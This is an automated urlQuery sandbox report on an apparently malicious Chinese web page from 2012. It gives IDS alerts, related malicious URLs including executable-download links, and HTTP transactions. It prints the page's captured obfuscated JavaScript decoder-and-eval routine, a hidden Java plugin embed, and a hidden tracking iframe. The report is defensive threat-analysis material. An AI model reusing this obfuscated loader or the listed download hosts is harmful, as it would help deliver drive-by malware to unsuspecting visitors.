Overview

URL: http://qq.wangmaqw.com/xx/index.html
IP: 112.213.118.229
ASN: AS38197 Sun Network (Hong Kong) Limited
Location: Hong Kong
Report completed: 2012-11-02 12:34:58 CET
urlQuery Alerts: No alerts detected


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer:
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-02 12:34:32 | 112.213.118.229 | urlQuery Client | 1 | ET CURRENT_EVENTS JavaScript Obfuscation JSXX Script
Snort /w Sourcefire VRT: No alerts detected


Recent reports on same IP/ASN/Domain

Last 4 reports on IP: 112.213.118.229

Date | Alerts / IDS | URL | IP
2012-11-02 20:51:55 | 0 / 1 | http://qq.wangmaqw.com/xx/index.html | 112.213.118.229
2012-11-02 20:50:43 | 0 / 0 | http://112.213.118.229 | 112.213.118.229
2012-11-02 19:45:22 | 0 / 4 | http://xx.xiamaw.com/010/jc112.txt | 112.213.118.229
2012-11-02 11:30:41 | 0 / 1 | http://qq.wangmaqw.com/xx/LVScHP2.html | 112.213.118.229

Last 6 reports on ASN: AS38197 Sun Network (Hong Kong) Limited

Date | Alerts / IDS | URL | IP
2013-02-15 22:57:10 | 0 / 0 | http://uyhec.pillscapi.ru.com/ | 112.213.118.30
2013-02-15 02:29:48 | 0 / 1 | http://fepjz.lfdoctor.ru.com/ | 112.213.118.30
2013-02-14 21:43:02 | 0 / 2 | http://stopreporter.com/.sys/?getexe=fb.73.exe | 112.213.108.77
2013-02-14 21:41:06 | 0 / 2 | http://stopreporter.com/.sys/?getexe=get.exe | 112.213.108.77
2013-02-14 21:41:06 | 0 / 2 | http://stopreporter.com/.sys/?getexe=pp.12.exe | 112.213.108.77
2013-02-14 21:40:46 | 0 / 1 | http://stopreporter.com/.sys/?getexe=v2prx.exe | 112.213.108.77

Last 3 reports on domain: qq.wangmaqw.com

Date | Alerts / IDS | URL | IP
2012-11-04 19:05:15 | 0 / 1 | http://qq.wangmaqw.com/xx/index.html | 112.213.118.228
2012-11-02 20:51:55 | 0 / 1 | http://qq.wangmaqw.com/xx/index.html | 112.213.118.229
2012-11-02 11:30:41 | 0 / 1 | http://qq.wangmaqw.com/xx/LVScHP2.html | 112.213.118.229



JavaScript

Executed Scripts (4)


Executed Evals (4)

#1 JavaScript::Eval (size: 4, repeated: 2)

eval

#2 JavaScript::Eval (size: 1455, repeated: 1)

function snSVx7() {
    kJMldnj4 = Math.PI;
    hLIJK1 = Math.tan;
    aJwmn5 = parseInt;
    eSeF7 = 'length';
    GUyy6 = 'test';
    yGdg6 = 'replace';
    scGYmu4 = aJwmn5(~ ((kJMldnj4 & kJMldnj4) | (~kJMldnj4 & kJMldnj4) & (kJMldnj4 & ~kJMldnj4) | (~kJMldnj4 & ~kJMldnj4)));
    deDYI4 = aJwmn5(((scGYmu4 & scGYmu4) | (~scGYmu4 & scGYmu4) & (scGYmu4 & ~scGYmu4) | (~scGYmu4 & ~scGYmu4)) & 1); /*Encrypt By xx.xiamaw.com's JSXX 0.44 VIP*/
    fzJuSu5 = deDYI4 << deDYI4;
    new function() {
        tsQNERT0 = pEfKB1('1Qe4dG*]6zY^k8vb]#&,m8$[x_GD3a]Nj5dsn7[F[8cu[S34Rlc]4r;idpDt=' [yGdg6](/[^v@0el9a]/g, ''));
    };
    try {
        if (!/^\d*$/g [GUyy6](HxSFUGc6));
    } catch (e) {
        HxSFUGc6 = scGYmu4;
    }
    DkJS7 = '';
    ExGWWtv1 = String[oVXcYr1('%6' + '6%72%' + '6F%6D%4' + '3%68%61' + '%72%4' + '3%6F%64' + '%65')];
    for (XxAgeoD6 = scGYmu4; XxAgeoD6 < MewFKXS8[eSeF7]; XxAgeoD6 -= -deDYI4) HxSFUGc6 = ((HxSFUGc6 & 127) << 25) | ((HxSFUGc6 & 4294967168) >>> 7) + MewFKXS8.charCodeAt(XxAgeoD6);
    LWJSUwm6 += deDYI4;
    HxSFUGc6 >>>= 0;
    for (XxAgeoD6 = scGYmu4, wlOxtO1 = deDYI4; XxAgeoD6 < CSNA8[eSeF7]; XxAgeoD6 += fzJuSu5, wlOxtO1++) {
        if (XxAgeoD6 >= (1 << 3)) {
            iIMV0 = XxAgeoD6 % (1 << 3);
        } else {
            iIMV0 = XxAgeoD6;
        }
        IVXXtD0 = aJwmn5('0x' + HxSFUGc6.toString(deDYI4 << 4).substr(iIMV0, 2)) + wlOxtO1;
        if (/^(\d{4})/g [GUyy6](IVXXtD0 + 744)) IVXXtD0 %= 5;
        DkJS7 += ExGWWtv1(aJwmn5(scGYmu4 + oVXcYr1('x') + CSNA8.charAt(XxAgeoD6) + CSNA8.charAt(XxAgeoD6 + aJwmn5(deDYI4))) ^ IVXXtD0);
    }
    try {
        new function() {
            tsQNERT0(DkJS7);
        }
    } catch (e) {
        try {
            new function() {
                kULc4 = parseInt;
                hLIJK1(DkJS7);
            }
        } catch (e) {
            window.location = '.';
        }
    }
}
try {
    pEfKB1('snSVx7();')
} catch (e) {
    try {
        LWJSUwm6 = scGYmu4;
        pEfKB1('snSVx7();');
    } catch (e) {
        alert('ere');
    }
}

#3 JavaScript::Eval (size: 236, repeated: 1)

hLIJK1 = tsQNERT0;
sBvgr1 = kULc4(20100418);
while (window.closed) {}
document.write("<br>");
var gondady = document.createElement('body');
documfnt.fody 'applndCzild?gon|aey4;	
Sa~ AoadJdj=Heel^yRaGa6g_tiRzs)k";H
Za? Ur<x
g<n^a0xs)l)tq"l"K;F

#4 JavaScript::Eval (size: 9, repeated: 2)

snSVx7();

Executed Writes (3)

#1 JavaScript::Write (size: 202, repeated: 1)

<a href="http://countt.51yes.com/index.aspx?id=211212103" target=_blank><img width=20 height=20 border=0 hspace=0 vspace=0 src="http://count21.51yes.com/count1.gif" alt="51YESQÙß¡ûß"></a>

#2 JavaScript::Write (size: 88, repeated: 1)

<embed id="deployJavaPlugin" type="application/java-deployment-toolkit" hidden="true" />

#3 JavaScript::Write (size: 398, repeated: 1)

<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count21.51yes.com/sa.htm?id=211212103&refe=&location=http%3A//qq.wangmaqw.com/xx/index.html&color=24x&resolution=1176x885&returning=0&language=undefined&ua=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%3B%20rv%3A1.9.2.13%29%20Gecko/20101203%20Firefox/3.6.13 height=0 width=0></iframe>


HTTP Transactions (8)


Request Response
GET /xx/index.html HTTP/1.1

Host: qq.wangmaqw.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Content-Length: 10279
Last-Modified: Fri, 02 Nov 2012 08:49:20 GMT
Accept-Ranges: bytes
Etag: "faeffaf2d6b8cd1:8ac"
Server: Microsoft-IIS/6.0
Date: Fri, 02 Nov 2012 11:34:23 GMT
GET /xx/swfobject.js HTTP/1.1

Host: qq.wangmaqw.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://qq.wangmaqw.com/xx/index.html
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Content-Length: 8153
Last-Modified: Fri, 02 Nov 2012 08:40:06 GMT
Accept-Ranges: bytes
Etag: "ec86f1a8d5b8cd1:8ac"
Server: Microsoft-IIS/6.0
Date: Fri, 02 Nov 2012 11:34:24 GMT
GET /xx/jpg.js HTTP/1.1

Host: qq.wangmaqw.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://qq.wangmaqw.com/xx/index.html
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Content-Length: 19883
Last-Modified: Fri, 02 Nov 2012 08:40:06 GMT
Accept-Ranges: bytes
Etag: "83a1f7a8d5b8cd1:8ac"
Server: Microsoft-IIS/6.0
Date: Fri, 02 Nov 2012 11:34:24 GMT
GET /click.aspx?id=211212103&logo=1 HTTP/1.1

Host: count21.51yes.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://qq.wangmaqw.com/xx/index.html
HTTP/1.1 200 OK

Content-Type: text/html; charset=gb2312
Date: Fri, 02 Nov 2012 11:34:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 1777
GET /count1.gif HTTP/1.1

Host: count21.51yes.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://qq.wangmaqw.com/xx/index.html
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 715
Last-Modified: Thu, 07 Apr 2005 17:25:22 GMT
Accept-Ranges: bytes
Etag: "02d4c7963bc51:d21"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 02 Nov 2012 11:34:29 GMT
GET /sa.htm?id=211212103&refe=&location=http%3A//qq.wangmaqw.com/xx/index.html&color=24x&resolution=1176x885&returning=0&language=undefined&ua=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%3B%20rv%3A1.9.2.13%29%20Gecko/20101203%20Firefox/3.6.13 HTTP/1.1

Host: count21.51yes.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://qq.wangmaqw.com/xx/index.html
HTTP/1.1 200 OK

Date: Fri, 02 Nov 2012 11:34:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 0
GET /favicon.ico HTTP/1.1

Host: qq.wangmaqw.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: eLdI1=Yes; cck_lasttime=1351856070533; cck_count=0
HTTP/1.1 404 Not Found

Content-Type: text/html
Content-Length: 1308
Server: Microsoft-IIS/6.0
Date: Fri, 02 Nov 2012 11:34:27 GMT
GET /favicon.ico HTTP/1.1

Host: qq.wangmaqw.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: eLdI1=Yes; cck_lasttime=1351856070533; cck_count=0
HTTP/1.1 404 Not Found

Content-Type: text/html
Content-Length: 1308
Server: Microsoft-IIS/6.0
Date: Fri, 02 Nov 2012 11:34:30 GMT